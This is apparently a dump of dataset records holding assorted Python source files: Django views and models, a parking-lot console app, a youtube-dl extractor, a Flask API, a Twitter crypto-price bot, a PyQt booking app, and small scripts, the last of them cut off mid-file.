annotate(comp_rank=Subquery(amfi_qs.values('comp_rank')[:1])). \\\n annotate(cap_type=Lower(Trim(Subquery(amfi_qs.values('cap_type')[:1])))). \\\n values('cap_type'). \\\n annotate(cap_count=Count('cap_type')). \\\n annotate(cap_cost=Round(Sum('value_cost'))). 
\\\n order_by('cap_type')\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n return context\n\n\n# one parameter named request\ndef dematsum_upload(request):\n # for quick debugging\n #\n # import pdb; pdb.set_trace()\n #\n # breakpoint()\n\n debug_level = 1\n # declaring template\n template = \"dematsum/dematsum_list.html\"\n data = DematSum.objects.all()\n\n # GET request returns the value of the data with the specified key.\n if request.method == \"GET\":\n return render(request, template)\n\n req_file = request.FILES['file']\n\n # let's check if it is a csv file\n\n if req_file.name.endswith('.xls') or req_file.name.endswith('.xlsx'):\n # get worksheet name\n # print('temporary file path:', req_file.temporary_file_path)\n print(req_file)\n\n if True:\n wb = openpyxl.load_workbook(req_file)\n print(wb.sheetnames)\n sheet_name = wb.sheetnames[0]\n print(sheet_name)\n ws = wb[sheet_name]\n df = pd.DataFrame(ws.values)\n else:\n xl = pd.ExcelFile(req_file)\n if debug_level > 0:\n print(xl.sheet_names)\n # single worksheet - Data\n sheet_name = xl.sheet_names[0]\n df = xl.parse(sheet_name)\n\n # can be 'Data'\n # can be 'Average MCap Jan Jun 2020'\n if sheet_name != 'Data':\n print(\"sheet name changed to\", sheet_name)\n\n # ignore top two line : Average Market Capitalization of listed companies during the six months ended\n # remove top two line from dataframe\n df = df.iloc[2:]\n\n if debug_level > 0:\n print(\"old columns : \")\n print(df.columns)\n\n # change column name of data frame\n columns_list = ['stock_symbol', 'comp_name', 'isin_code_id', 'qty', 'acp',\n 'cmp', 'pct_change', 'value_cost', 'value_market',\n 'days_gain', 'days_gain_pct', 'realized_pl', 'unrealized_pl',\n 'unrealized_pl_pct', 'unused1']\n df.columns = columns_list\n\n if debug_level > 0:\n print(\"new columns : \")\n print(df.columns)\n\n # Keep only top 1000 entries\n df = df.iloc[:1000]\n\n # round avg_mcap\n # df = df.round({'avg_mcap' : 1})\n # covert to numeric\n # df[[\"avg_mcap\"]] = df[[\"avg_mcap\"]].apply(pd.to_numeric)\n df[[\"avg_mcap\"]] = df[[\"avg_mcap\"]].astype(int)\n\n # drop columns that are not required\n # skip_columns_list = ['bse_mcap', 'nse_mcap', 'mse_symbol', 'mse_mcap']\n # df.drop(skip_columns_list, axis=1, inplace=True)\n\n data_set = df.to_csv(header=True, index=False)\n\n if req_file.name.endswith('.csv'):\n data_set = req_file.read().decode('UTF-8')\n\n if not (req_file.name.endswith('.csv') or req_file.name.endswith('.xls') or req_file.name.endswith('.xlsx')):\n messages.error(request, req_file.name + ' : THIS IS NOT A XLS/XLSX/CSV FILE.')\n return HttpResponseRedirect(reverse(\"dematsum-list\"))\n\n # delete existing records\n print('Deleted existing DematSum data')\n DematSum.objects.all().delete()\n\n # setup a stream which is when we loop through each line we are able to handle a data in a stream\n\n io_string = io.StringIO(data_set)\n next(io_string)\n for column in csv.reader(io_string, delimiter=',', quotechar='\"'):\n column[0] = column[0].strip()\n column[1] = column[1].strip()\n\n _, created = DematSum.objects.update_or_create(\n stock_symbol=column[0],\n comp_name=column[1],\n isin_code_id=column[2],\n qty=column[3],\n acp=column[4],\n cmp=column[5],\n pct_change=column[6],\n value_cost=column[7],\n value_market=column[8],\n days_gain=column[9],\n days_gain_pct=column[10],\n realized_pl=column[11],\n unrealized_pl=column[12],\n unrealized_pl_pct=column[13],\n unused1=column[14]\n )\n # context = {}\n # render(request, template, 
context)\n lastrefd_update(\"dematsum\")\n #\n print('Completed loading new Dematsum data')\n return HttpResponseRedirect(reverse(\"dematsum-list\"))\n\n# from django.http import HttpResponse\n# def index(request):\n# return HttpResponse(\"Hello, world. You're at the polls index.\")\n#\n","sub_path":"django_gotolong/dematsum/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"158319801","text":"from django.db import models\nimport datetime\nfrom dateutil.relativedelta import relativedelta\nfrom collections import Counter\nfrom django.urls import reverse\n\n\n__all__ = ('Player', 'Match', 'Event', 'Attendance')\n\n\nclass Player(models.Model):\n name = models.CharField(max_length=128, verbose_name='Imię i nazwisko')\n birth_date = models.DateField(null=True, blank=True, verbose_name='data urodzenia')\n adress = models.CharField(max_length=128, blank=True, verbose_name='adres')\n med_check_date = models.DateField(null=True, blank=True, verbose_name='data badania')\n licence_number = models.IntegerField(null=True, blank=True, verbose_name='nr licencji')\n elo_rating = models.SmallIntegerField(default=1200)\n\n class Meta:\n verbose_name = 'Zawodnik'\n verbose_name_plural = 'Zawodnicy'\n\n def __str__(self):\n return self.name\n\n def med_check(self):\n med_check_date = self.med_check_date\n med_check_span = relativedelta(datetime.date.today(), med_check_date)\n return {'med_check_span': med_check_span}\n\n def performance(self):\n wins_1, wins_2, win_list, loss_list = 0, 0, [], []\n match_1 = self.player_1.all()\n match_2 = self.player_2.all()\n if match_1 or match_2:\n for m in match_1:\n if m.result_pl_1 == 3:\n wins_1 += 1\n win_list.append(m.player_2.name)\n else:\n loss_list.append(m.player_2.name)\n for m in match_2:\n if m.result_pl_2 == 3:\n wins_2 += 1\n win_list.append(m.player_1.name)\n else:\n loss_list.append(m.player_1.name)\n success_rate = (round((wins_1 + wins_2) / (len(match_1) + len(match_2)) * 100, 2))\n failure_rate = 100 - success_rate\n else:\n success_rate = 'Brak pojedynków'\n failure_rate = 'Brak pojedynków'\n defeated = Counter(win_list).most_common(3)\n defeated_by = Counter(loss_list).most_common(3)\n return {'success_rate': success_rate,\n 'failure_rate': failure_rate,\n 'defeated': defeated,\n 'defeated_by': defeated_by}\n\n\nclass Match(models.Model):\n RESULT = (\n (0, '0'),\n (1, '1'),\n (2, '2'),\n (3, '3'),\n )\n player_1 = models.ForeignKey('Player', related_name='player_1', null=True, verbose_name='zawodnik 1')\n player_2 = models.ForeignKey('Player', related_name='player_2', null=True, verbose_name='zawodnik 2')\n player_1_result = models.PositiveSmallIntegerField(choices=RESULT, default=0, verbose_name='wynik zawodnika 1')\n player_2_result = models.PositiveSmallIntegerField(choices=RESULT, default=0, verbose_name='wynik zawodnika 2')\n description = models.TextField(blank=True, null=True, verbose_name='opis')\n date = models.DateField(verbose_name='data')\n\n class Meta:\n verbose_name = 'Pojedynek'\n verbose_name_plural = 'Pojedynki'\n\n def __str__(self):\n return '{} - {} - {}'.format(self.player_1, self.player_2, self.date)\n\n def save(self, *args, **kwargs):\n try:\n player_1 = Player.objects.get(pk=self.player_1.pk)\n player_2 = Player.objects.get(pk=self.player_2.pk)\n player_1_elo = player_1.elo_rating\n player_2_elo = player_2.elo_rating\n expected_1 = 1 / (1 + 10 ** ((player_2_elo - player_1_elo) / 400))\n expected_2 
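# The dematsum views above repeat one Django ORM pattern: annotate each
# DematSum row with a column pulled from the Amfi row sharing its ISIN, via a
# correlated subquery. Reduced to its core below; the model and field names are
# reused from the record, and this sketch only runs inside a configured Django
# project that defines them.
from django.db.models import OuterRef, Subquery

amfi_qs = Amfi.objects.filter(comp_isin=OuterRef("isin_code_id"))
ranked = DematSum.objects.annotate(
    comp_rank=Subquery(amfi_qs.values("comp_rank")[:1])  # first matching rank
).order_by("comp_rank")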
= 1 / (1 + 10 ** ((player_1_elo - player_2_elo) / 400))\n if self.player_1_result == 3:\n player_1_new_elo = player_1.elo_rating + 32 * (1 - expected_1)\n player_2_new_elo = player_2.elo_rating + 32 * (0 - expected_2)\n else:\n player_1_new_elo = player_1.elo_rating + 32 * (0 - expected_2)\n player_2_new_elo = player_2.elo_rating + 32 * (1 - expected_1)\n player_1.elo_rating = player_1_new_elo\n player_2.elo_rating = player_2_new_elo\n player_1.save()\n player_2.save()\n except Exception as e:\n print(e)\n super(Match, self).save(*args, **kwargs)\n\n\nclass Event(models.Model):\n name = models.CharField(max_length=255, null=True, verbose_name='nazwa')\n description = models.TextField(blank=True, null=True, verbose_name='opis')\n start = models.DateTimeField(null=True)\n end = models.DateTimeField(null=True, verbose_name='koniec')\n\n class Meta:\n verbose_name = 'Wydarzenie'\n verbose_name_plural = 'Wydarzenia'\n\n def __str__(self):\n return self.name\n\n\nclass Attendance(models.Model):\n players = models.ManyToManyField(Player, verbose_name='Zawodnik')\n event = models.ForeignKey(Event, verbose_name='Wydarzenie')\n present = models.BooleanField()\n\n def get_absolute_url(self):\n return reverse ('event', kwargs={'pk': self.event.pk})","sub_path":"tenisowka_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"114492633","text":"class Parking_lot:\n\n def __init__(self,name,size):\n self.name = name\n self.size = size\n self.slots = [(0,0)] * self.size\n\n \n def park_car(self, Registration_no, Color ):\n \n Empty_slot = self.get_slot()\n if Empty_slot == -1:\n print(\"Parking space is full, no slots available!\")\n return None\n self.slots[Empty_slot] = (Registration_no, Color)\n print(f\"Please park your Car in slot number : {Empty_slot}\")\n\n def Exit(self,Registration_no):\n for slot in range(self.size):\n if self.slots[slot][0] == Registration_no:\n self.slots[slot] = (0,0)\n return slot\n\n def Cars_by_color(self,):\n pass\n\n def slot_of_car_by_Reg_no (self,Registration_no):\n \n for slot in range(self.size):\n if self.slots[slot][0] == Registration_no:\n print(f\"The Car with Registration number '{Registration_no}' is parked in slot no. {slot}\")\n break\n else:\n print(\"There is no such car parked here\")\n\n def slots_of_cars_by_color (self,Color):\n Same_colored_cars = []\n \n for i in range(self.size):\n if self.slots[i][1] == Color:\n Same_colored_cars.append(i)\n\n print(f\"The cars with color {Color} is present is following slots: {Same_colored_cars}\")\n\n\n def get_slot(self):\n for slot in range(self.size):\n if self.slots[slot] == (0,0):\n return slot\n else:\n return -1\n\n\n\n def checkout_bill(self):\n pass\n\n def View_parking_arena(self):\n\n print(\"Slot No.\\tRegistration No.\\tColor\")\n \n for i in range(self.size):\n if self.slots[i] != (0,0):\n print(str(i) + \"\\t\\t\" +str(self.slots[i][0]) + \"\\t\\t\" + str(self.slots[i][1]))\n else:\n continue\n\n\nif __name__ == \"__main__\":\n\n # Parking_lot = Parking_lot(\"SafePark\",6)\n # Parking_lot.park_car(\"KA51-AA-5396\", \"Red\")\n # Parking_lot.slot_of_car_by_Reg_no(\"KA51-AA-5396\")\n\n\n Name = input(\"What is the name of Parking lot: \")\n Size = int(input(\"How much car can it hold? 
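# Match.save() above applies the standard Elo update with K = 32. A sketch of
# the expected-score formula on its own, with made-up ratings to show the
# magnitudes involved:
def elo_expected(r_a, r_b):
    return 1 / (1 + 10 ** ((r_b - r_a) / 400))

e = elo_expected(1200, 1400)                           # 200-point underdog
assert abs(e - 0.24) < 0.01                            # ~24% expected score
assert abs(elo_expected(1400, 1200) + e - 1.0) < 1e-9  # both sides sum to 1
# After a win, new_rating = old_rating + 32 * (1 - expected), as in save().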
\"))\n Parking_lot = Parking_lot(Name, Size) \n print(f\"Welcome to {Name}, we can accomodate up to {Size} cars\")\n\n def Menu():\n print(\"\"\"\n Please find the MENU below:\n\n Press 1 to park your car\n Press 2 to exit the parking lot\n Press 3 to know your car slot\n Press 4 to know all the slots for cars of particular color\n press 5 to get the nearest empty slot\n Type Exit or Quit to end the prompt\n\n \"\"\")\n Menu()\n while True:\n\n Options = input()\n\n if Options == \"1\":\n Reg_no = input(\"Please Enter the registration number: \")\n Color = input(\"What is the color of your car? \")\n Parking_lot.park_car(Reg_no,Color)\n\n elif Options == \"2\":\n Reg_no = input(\"Please Enter the registration number: \")\n # Parking_lot.Exit(Reg_no)\n print(f\"Your car with Reg_no - {Reg_no} is exited from slot no. {Parking_lot.Exit(Reg_no)}\")\n\n elif Options == \"3\":\n Reg_no = input(\"Please Enter the registration number of your car: \")\n Parking_lot.slot_of_car_by_Reg_no(Reg_no)\n\n \n elif Options == \"4\":\n Color = input(\"Please type the color of the car: \").lower()\n Parking_lot.slots_of_cars_by_color(Color)\n\n elif Options == \"5\":\n print(f\"The nearest empty slot is: {Parking_lot.get_slot()}\")\n\n elif Options == \"6\":\n Parking_lot.View_parking_arena()\n\n elif Options.lower() == \"quit\" or Options.lower() == \"exit\":\n print(f\"Thank you for choosing {Name}, Please visit again!\")\n break\n\n else:\n print(\"Invalid choice, please select a valid option from the Menu\")\n Menu()\n\n\n\n\n\n\n\n\n\n","sub_path":"Projects/Parkinglot/Parking lot/Parking_lot_fs.py","file_name":"Parking_lot_fs.py","file_ext":"py","file_size_in_byte":4101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"391740677","text":"# coding: utf-8\nfrom __future__ import unicode_literals\n\nimport re\n\nfrom .common import InfoExtractor\nfrom ..compat import compat_str\nfrom ..utils import (\n determine_ext,\n parse_duration,\n try_get,\n unified_strdate,\n)\n\n\nclass MediasetIE(InfoExtractor):\n _VALID_URL = r'''(?x)\n (?:\n mediaset:|\n https?://\n (?:www\\.)?video\\.mediaset\\.it/\n (?:\n (?:video|on-demand)/(?:[^/]+/)+[^/]+_|\n player/playerIFrame(?:Twitter)?\\.shtml\\?.*?\\bid=\n )\n )(?P[0-9]+)\n '''\n _TESTS = [{\n # full episode\n 'url': 'http://www.video.mediaset.it/video/hello_goodbye/full/quarta-puntata_661824.html',\n 'md5': '9b75534d42c44ecef7bf1ffeacb7f85d',\n 'info_dict': {\n 'id': '661824',\n 'ext': 'mp4',\n 'title': 'Quarta puntata',\n 'description': 'md5:7183696d6df570e3412a5ef74b27c5e2',\n 'thumbnail': r're:^https?://.*\\.jpg$',\n 'duration': 1414,\n 'creator': 'mediaset',\n 'upload_date': '20161107',\n 'series': 'Hello Goodbye',\n 'categories': ['reality'],\n },\n 'expected_warnings': ['is not a supported codec'],\n }, {\n 'url': 'http://www.video.mediaset.it/video/matrix/full_chiambretti/puntata-del-25-maggio_846685.html',\n 'md5': '1276f966ac423d16ba255ce867de073e',\n 'info_dict': {\n 'id': '846685',\n 'ext': 'mp4',\n 'title': 'Puntata del 25 maggio',\n 'description': 'md5:ee2e456e3eb1dba5e814596655bb5296',\n 'thumbnail': r're:^https?://.*\\.jpg$',\n 'duration': 6565,\n 'creator': 'mediaset',\n 'upload_date': '20180525',\n 'series': 'Matrix',\n 'categories': ['infotainment'],\n },\n 'expected_warnings': ['HTTP Error 403: Forbidden'],\n }, {\n # clip\n 'url': 'http://www.video.mediaset.it/video/gogglebox/clip/un-grande-classico-della-commedia-sexy_661680.html',\n 'only_matching': True,\n }, {\n # iframe simple\n 'url': 
'http://www.video.mediaset.it/player/playerIFrame.shtml?id=665924&autoplay=true',\n 'only_matching': True,\n }, {\n # iframe twitter (from http://www.wittytv.it/se-prima-mi-fidavo-zero/)\n 'url': 'https://www.video.mediaset.it/player/playerIFrameTwitter.shtml?id=665104&playrelated=false&autoplay=false&related=true&hidesocial=true',\n 'only_matching': True,\n }, {\n 'url': 'mediaset:661824',\n 'only_matching': True,\n }]\n\n @staticmethod\n def _extract_urls(webpage):\n return [\n mobj.group('url')\n for mobj in re.finditer(\n r']+\\bsrc=([\"\\'])(?Phttps?://(?:www\\.)?video\\.mediaset\\.it/player/playerIFrame(?:Twitter)?\\.shtml\\?.*?\\bid=\\d+.*?)\\1',\n webpage)]\n\n def _real_extract(self, url):\n video_id = self._match_id(url)\n\n video = self._download_json(\n 'https://www.video.mediaset.it/html/metainfo.sjson',\n video_id, 'Downloading media info', query={\n 'id': video_id\n })['video']\n\n title = video['title']\n media_id = video.get('guid') or video_id\n\n video_list = self._download_json(\n 'http://cdnsel01.mediaset.net/GetCdn2018.aspx',\n video_id, 'Downloading video CDN JSON', query={\n 'streamid': media_id,\n 'format': 'json',\n })['videoList']\n\n formats = []\n for format_url in video_list:\n ext = determine_ext(format_url)\n if ext == 'm3u8':\n formats.extend(self._extract_m3u8_formats(\n format_url, video_id, 'mp4', entry_protocol='m3u8_native',\n m3u8_id='hls', fatal=False))\n elif ext == 'mpd':\n formats.extend(self._extract_mpd_formats(\n format_url, video_id, mpd_id='dash', fatal=False))\n elif ext == 'ism' or '.ism' in format_url:\n formats.extend(self._extract_ism_formats(\n format_url, video_id, ism_id='mss', fatal=False))\n else:\n formats.append({\n 'url': format_url,\n 'format_id': determine_ext(format_url),\n })\n self._sort_formats(formats)\n\n creator = try_get(\n video, lambda x: x['brand-info']['publisher'], compat_str)\n category = try_get(\n video, lambda x: x['brand-info']['category'], compat_str)\n categories = [category] if category else None\n\n return {\n 'id': video_id,\n 'title': title,\n 'description': video.get('short-description'),\n 'thumbnail': video.get('thumbnail'),\n 'duration': parse_duration(video.get('duration')),\n 'creator': creator,\n 'upload_date': unified_strdate(video.get('production-date')),\n 'webpage_url': video.get('url'),\n 'series': video.get('brand-value'),\n 'season': video.get('season'),\n 'categories': categories,\n 'formats': formats,\n }\n","sub_path":"youtube_dl/extractor/mediaset.py","file_name":"mediaset.py","file_ext":"py","file_size_in_byte":5376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"481854446","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def minDiffInBST(self, root: TreeNode) -> int:\n result, prev = float('inf'), float('-inf')\n def inorder(node):\n nonlocal result, prev\n if node:\n inorder(node.left)\n result = min(result, node.val - prev)\n prev = node.val\n inorder(node.right)\n inorder(root)\n return result","sub_path":"LeetCode/Minimum Distance Between BST Nodes.py","file_name":"Minimum Distance Between BST Nodes.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"52431041","text":"import greenthumb\nimport flask\nimport json\n\nfrom greenthumb import util\nimport mongoengine\n\"\"\"\n\nGreenThumb 
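# The minDiffInBST record above relies on one property: an inorder walk of a
# BST visits values in sorted order, so the minimum difference must occur
# between inorder neighbours. The same idea over a plain sorted list
# (illustrative input):
def min_adjacent_gap(sorted_vals):
    return min(b - a for a, b in zip(sorted_vals, sorted_vals[1:]))

assert min_adjacent_gap([1, 3, 6, 7, 10]) == 1   # the 6-7 pair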
REST API: guides.\n\nGreenThumb Group \n\n\"\"\"\n\n@greenthumb.app.route('/api/v1/guides/', methods=['GET'])\ndef get_guides():\n\n \"\"\" Route to get the guide page list \"\"\"\n\n guides = []\n\n with util.MongoConnect():\n for guide in greenthumb.models.mongo.guides.objects():\n guides.append(json.loads(guide.to_json()))\n\n return flask.jsonify(guides)\n\n@greenthumb.app.route('/api/v1/guides//', methods=['GET'])\ndef get_guide_page(guide_page_id):\n\n \"\"\" Route to get a guide page \"\"\"\n\n guide = {}\n\n with util.MongoConnect():\n guide = greenthumb.models.mongo.guides.objects.get(id=guide_page_id)\n\n return flask.jsonify(guide.to_dict())\n","sub_path":"backend/greenthumb/api/guides.py","file_name":"guides.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"145782633","text":"from API_Twitter import api\nfrom time import sleep\nfrom cryptos import crypto_price\nfrom dailys import daily_posts\nfrom database import check_user_db, get_user, retweet_autentication\n\nmentions = api.mentions_timeline()\nFILE_NAME = \"last_seen_id.txt\"\n\ndef retrieve_last_seen_id(file_name):\n f_read = open(file_name, 'r')\n last_seen_id = int(f_read.read().strip())\n f_read.close()\n return last_seen_id\n\ndef store_last_seen_id(last_seen_id, file_name):\n f_write = open(file_name, 'w')\n f_write.write(str(last_seen_id))\n f_write.close()\n return\ndef analise():\n last_seen_id = retrieve_last_seen_id(FILE_NAME)\n mentions = api.mentions_timeline(\n since_id=last_seen_id,\n tweet_mode='extended')\n cryptos = [['#bitcoin', 'do Bitcoin', 'bitcoin'], ['#ethereum', 'do Ethereum', 'ethereum'],\n ['#nano', 'da Nano', 'nano'],['#litecoin', 'da Litecoin', 'litecoin'],\n ['#monero', 'do Monero', 'monero'], ['#dash', 'da Dash', 'dash']]\n\n for mention in reversed(mentions):\n print(str(mention.id) + ' - ' + mention.full_text)\n last_seen_id = mention.id\n store_last_seen_id(last_seen_id,FILE_NAME)\n porc = (('#soça', 'soca', 'soça'), ('#fascista', 'fascista', 'fascista'), ('#ancap', 'ancap', 'ancap'), ('#comunista', 'soca', 'comunista'))\n #Analise de #\n if '#retweet' in mention.full_text.lower():\n autenticado = False\n for x in retweet_autentication():\n if mention.user.screen_name in x[0]:\n autenticado = True\n if autenticado == True:\n reply_id = api.get_status (mention.id).in_reply_to_status_id\n api.retweet(reply_id)\n else:\n api.send_direct_message (mention.user.id, 'Voce nao tem permissao para usar o #retweet')\n elif '#crypto' in mention.full_text.lower():\n crypto_str = crypto_price('todos')\n crypto_str = crypto_str.strip()\n api.update_status('@' + mention.user.screen_name + '\\n'\n f'{crypto_str}', mention.id)\n elif '#cripto' in mention.full_text.lower():\n crypto_str = crypto_price('todos')\n crypto_str = crypto_str.strip()\n api.update_status('@' + mention.user.screen_name + '\\n'\n f'{crypto_str}', mention.id)\n else:\n for x in cryptos:\n if x[0] in mention.full_text.lower():\n api.update_status('@' + mention.user.screen_name +\n f' O preço {x[1]} é: $' + f'{crypto_price(x[2]):.2f} dolares', mention.id)\n for x in porc:\n if x[0] in mention.full_text.lower():\n check_user_db(mention.user.screen_name)\n api.update_status('@' + mention.user.screen_name + '\\n'\n f'Voce é {get_user(mention.user.screen_name, x[1])}% {x[2]}!', mention.id)\n\nwhile True:\n daily_posts()\n analise()\n 
sleep(15)\n","sub_path":"MAIN.py","file_name":"MAIN.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"201837671","text":"import sys\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5 import uic\nimport sqlite3\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QErrorMessage\nfrom project.mainwin import Ui_MainWindow\nfrom project.salonwin import Ui_choose_salon\nfrom project.myregwin import Ui_my_register\n\n\nclass RegisterForm(Ui_MainWindow, QMainWindow):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n self.i = ''\n self.salons1 = Salons()\n self.registers = Registers()\n self.pushButton.clicked.connect(self.description_add)\n self.flag = False\n self.save_button.clicked.connect(self.button_function)\n self.check_register.clicked.connect(self.registers.show)\n self.data_salons = {}\n self.procedure_and_salon = {}\n self.data_procedures = {}\n self.load_db()\n self.load_main()\n\n def button_function(self):\n if self.name.text() and self.flag == True:\n self.salons1.show()\n self.flag = False\n with open(\"datapersons\", \"a\") as file:\n file.write(self.name.text() + ',')\n file.write(str(self.procedures.currentText()) + ',')\n else:\n error_dialog = QErrorMessage()\n error_dialog.showMessage(\"Введены не все данные\")\n error_dialog.exec_()\n\n def load_db(self):\n con = sqlite3.connect(\"MyDataBase.db\")\n cur = con.cursor()\n names_procedures = []\n descriptions = []\n list_names_procedures = cur.execute(\"\"\"SELECT name_procedure, salon FROM procedure\"\"\").fetchall()\n list_descriptions = cur.execute(\"\"\"SELECT description FROM procedure\"\"\").fetchall()\n for elem in list_names_procedures:\n if elem[0] not in names_procedures:\n names_procedures.append(elem[0])\n for elem in list_descriptions:\n if elem[0] not in descriptions:\n descriptions.append(elem[0])\n for i in range(len(names_procedures)):\n self.data_procedures[names_procedures[i]] = descriptions[i]\n for i in range(len(list_names_procedures)):\n if list_names_procedures[i][0] not in self.procedure_and_salon.keys():\n self.procedure_and_salon[list_names_procedures[i][0]] = [list_names_procedures[i][1]]\n else:\n self.procedure_and_salon[list_names_procedures[i][0]].append(list_names_procedures[i][1])\n self.data_salons = cur.execute(\"\"\"SELECT * FROM salon\"\"\").fetchall()\n con.close()\n\n def load_main(self):\n for i in self.data_procedures:\n self.procedures.addItem(i)\n\n def description_add(self):\n text = self.procedures.currentText()\n for i in self.data_procedures.keys():\n if i == text:\n self.description_procedure.clear()\n self.description_procedure.appendPlainText(self.data_procedures[i])\n self.description_procedure.setReadOnly(True)\n self.flag = True\n\n\nclass Salons(QWidget, Ui_choose_salon):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n self.data_salons = {}\n self.flag = False\n self.time = ''\n self.date = ''\n self.data_procedures = {}\n self.load_db()\n self.load_choose()\n self.pushButton.clicked.connect(self.description_add)\n self.save_register.clicked.connect(self.register)\n\n def load_choose(self):\n for i in self.data_salons:\n self.choose_sal.addItem(i[1])\n\n def load_db(self):\n con = sqlite3.connect(\"MyDataBase.db\")\n cur = con.cursor()\n names_procedures = []\n descriptions = []\n list_names_procedures = cur.execute(\"\"\"SELECT name_procedure, salon FROM procedure\"\"\").fetchall()\n list_descriptions = 
cur.execute(\"\"\"SELECT description FROM procedure\"\"\").fetchall()\n for elem in list_names_procedures:\n if elem[0] not in names_procedures:\n names_procedures.append(elem[0])\n for elem in list_descriptions:\n if elem[0] not in descriptions:\n descriptions.append(elem[0])\n for i in range(len(names_procedures)):\n self.data_procedures[names_procedures[i]] = descriptions[i]\n '''for i in range(len(list_names_procedures)):\n if list_names_procedures[i][0] not in self.procedure_and_salon.keys():\n self.procedure_and_salon[list_names_procedures[i][0]] = [list_names_procedures[i][1]]\n else:\n self.procedure_and_salon[list_names_procedures[i][0]].append(list_names_procedures[i][1])'''\n self.data_salons = cur.execute(\"\"\"SELECT * FROM salon\"\"\").fetchall()\n con.close()\n\n def description_add(self):\n self.flag = True\n text = self.choose_sal.currentText()\n for i in self.data_salons:\n if i[1] == text:\n self.description_salon.clear()\n st = f\"{i[2]}\\n{i[3]} \"\n self.description_salon.appendPlainText(st)\n self.description_salon.setReadOnly(True)\n\n def register(self):\n if self.flag:\n self.flag = False\n self.date = self.dateTimeEdit.dateTime().toString('dd-MM-yyyy')\n self.time = self.dateTimeEdit.dateTime().toString('hh:mm')\n with open(\"datapersons\", 'a') as file:\n file.write(self.choose_sal.currentText() + ',')\n file.write(self.date + ',')\n file.write(self.time)\n file.write('\\n')\n self.close()\n else:\n error_dialog = QErrorMessage()\n error_dialog.showMessage(\"Введены не все данные\")\n error_dialog.exec_()\n\n\nclass Registers(QWidget, Ui_my_register):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n self.okbutton.clicked.connect(self.button)\n\n def button(self):\n self.listWidget.clear()\n lst = []\n if self.name_r.text():\n with open(\"datapersons\", \"r\") as file:\n for line in file:\n lst.append(line.split(','))\n date = self.calendarWidget.selectedDate().toString(\"dd-MM-yyyy\")\n name = self.name_r.text()\n for elem in lst:\n if elem[0] == name and elem[3] == date:\n self.listWidget.addItem(f\"{elem[4]} {elem[1]} {elem[2]}\")\n\n\nsys._excepthook = sys.excepthook\n\n\ndef exception_hook(exctype, value, traceback):\n sys._excepthook(exctype, value, traceback)\n sys.exit(1)\n\n\nsys.excepthook = exception_hook\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n ex = RegisterForm()\n ex.show()\n sys.exit(app.exec_())","sub_path":"project/programm.py","file_name":"programm.py","file_ext":"py","file_size_in_byte":6765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"363850528","text":"import os\r\nimport collections\r\n\r\n#Получаем список расширений всех файлов\r\n\r\ndef ext():\r\n types = []\r\n for root, dirs, files in os.walk('.'):\r\n for fl in files:\r\n filename, file_extension = os.path.splitext(fl)\r\n types.append(file_extension)\r\n return types\r\n\r\n#Делаем из них частотный словарь\r\n\r\ndef freq(d):\r\n counter = collections.Counter(d)\r\n counter = collections.Counter(counter).most_common(1)[0][0]\r\n return counter\r\n\r\n###Находим самое частотное - это какой-то сложный вариант, я нашла .most_common()\r\n## \r\n##def first(d):\r\n## main = sorted(d, key=d.get, reverse=True)\r\n## return 'Чаще всего встречаются: ' + '\\\"' + main[0] + \\\r\n## '\\\":' + '\\t' + str(d[main[0]])\r\n\r\n\r\ndef main():\r\n print('Самое частое разрешение: ', freq(ext()))\r\n\r\n \r\nif __name__ == \"__main__\":\r\n 
main()\r\n","sub_path":"hw13/hw13.py","file_name":"hw13.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"32422144","text":"from sys import stdin\ndef main():\n longitud=int(stdin.readline().strip())\n while longitud!=0:\n cont=0\n rangos=[int(x) for x in stdin.readline().strip().split()]\n\n for i in range(1,len(rangos)-1):\n if rangos[i-1]>rangos[i]rangos[i+1]:\n cont+=1\n \n\n if (rangos[-1]>rangos[0]rangos[0]):\n cont+=1\n if (rangos[-1]rangos[1]):\n cont+=1\n\n if (rangos[-2]>rangos[-1] pentru continua'.format(self.limita_avertisment))\r\n\r\n answer = input('Doriti sa trimiteti un e-mail de avertizare? (Y/N)')\r\n\r\n self.sold -= self.cant\r\n\r\n if answer.upper() == 'Y':\r\n sender = input('introduceti adresa dvs de gmail:\\n')\r\n passw = input('introduceti parola dvs de gmail:\\n')\r\n receiver = input('introduceti adresa la care doriti sa trimiteti mailul de avertizare:\\n')\r\n subiect_ma = 'Limita de {0} a fost atinsa pentru soldul produsului: {1}'.format(self.limita_avertisment,\r\n self.prod)\r\n text_ma = 'Soldul produsului {0} este acum: {1}'.format(self.prod, self.sold)\r\n mesaj_avertizare='Subject: {0}\\n\\n{1}'.format(subiect_ma,text_ma)\r\n conexiune = smtplib.SMTP_SSL('smtp.gmail.com', 465)\r\n conexiune.login(user=sender, password=passw)\r\n conexiune.sendmail(from_addr=sender, to_addrs=receiver, msg=mesaj_avertizare)\r\n else:\r\n pass\r\n\r\n if self.d.keys():\r\n cheie = max(self.d.keys()) + 